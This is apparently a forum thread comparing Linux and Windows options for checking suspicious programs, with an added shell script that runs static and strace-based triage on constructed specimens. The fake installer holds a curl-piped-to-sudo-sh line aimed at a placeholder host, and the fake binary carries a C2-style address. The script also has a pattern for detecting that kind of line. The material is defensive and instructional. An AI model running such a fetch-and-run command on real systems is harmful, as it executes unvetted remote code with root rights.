
You have so many more practical options for even amateur security auditing on Linux. You can trivially spin up a temporary OS/chroot/container and run your specimen inside it, or run it under strace and log every system call, or statically sift through an executable for strings like IP addresses in an instant using basic tools. Bash install scripts can simply be grepped. It's an environment that gives the user control by default, and as such it's that much harder for executables to gain the upper hand.

Obviously you don't do that for every binary you run, but you have options if there's something you're a bit suspicious of.
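The triage the comment above describes (grep the install script, sift the binary for IP literals, run it under strace), as an added example that is not part of the original comment. The "install script" and "binary" are constructed inline with TEST-NET addresses so it runs offline; the function names and the suspicious patterns it looks for are this example's own choices, not anything from the thread.

```shell
#!/bin/sh
# Added example, not from the thread: a minimal triage pass over an untrusted
# artifact using only stock Linux tools. Both specimens are constructed here
# (hypothetical content, TEST-NET addresses); point the functions at the real
# files in practice.
set -eu

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# Constructed specimen 1: an installer that pipes remote content into a shell.
cat > "$WORK/install.sh" <<'EOF'
#!/bin/sh
echo "installing..."
curl -fsSL http://203.0.113.7/setup | sudo sh
echo "done"
EOF

# Constructed specimen 2: a fake "binary" with a hard-coded C2 address inside.
printf 'ELF\0\0junk\0connect to 198.51.100.23:4444\0\0/tmp/.cache\0' \
    > "$WORK/specimen.bin"

# Static pass A: pull dotted-quad IPv4 literals out of any file.
# strings(1) comes from binutils; tr is the fallback where it is missing.
extract_ips() {
    if command -v strings >/dev/null 2>&1; then
        strings "$1"
    else
        tr -c '[:print:]' '\n' < "$1"
    fi | grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}' | sort -u
}

# Static pass B: flag "download | shell" one-liners in an install script.
# Prints matching lines prefixed with their line number; no output means none.
flag_pipe_to_shell() {
    grep -nE '(curl|wget)[^|]*\|[[:space:]]*(sudo[[:space:]]+)?(ba|z|da)?sh([[:space:]]|$)' "$1" || true
}

# Dynamic pass: run a command under strace, keep only network/process/file
# syscalls in a log you can grep later, and print how many connect/execve
# lines were recorded. Prints 0 if strace is absent or ptrace is blocked
# (common inside containers) so the static passes still complete.
trace_syscalls() {
    log=$1; shift
    if ! command -v strace >/dev/null 2>&1; then
        echo "strace not available; skipping dynamic pass" >&2
        echo 0
        return 0
    fi
    strace -f -o "$log" -e trace=%network,%process,%file "$@" >/dev/null 2>&1 || true
    [ -f "$log" ] || { echo 0; return 0; }
    grep -cE '^[0-9]+ +(connect|execve)\(' "$log" || true
}

echo "== IPv4 literals in specimen.bin =="
extract_ips "$WORK/specimen.bin"
echo "== download|shell lines in install.sh =="
flag_pipe_to_shell "$WORK/install.sh"
echo "== connect/execve calls while running a harmless command under strace =="
trace_syscalls "$WORK/trace.log" sh -c 'echo hello'
```

The static passes are cheap enough to run on every suspicious download; the strace pass is the one to do inside a throwaway VM or container, since it actually executes the specimen. Keep the `-o` log file rather than reading the live stream, so a noisy program does not scroll the interesting `connect(` line out of view.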



All of those options have Windows analogues though. Windows users can spin up a VM, run procmon, and even have access to text editors.


Indeed. "Run a program or browser extension in Sandbox mode" is a great deal easier in Windows than the equivalent in Linux.


If people were doing their due diligence on every binary they execute, malware beyond highly targeted zero-days would be nonexistent.



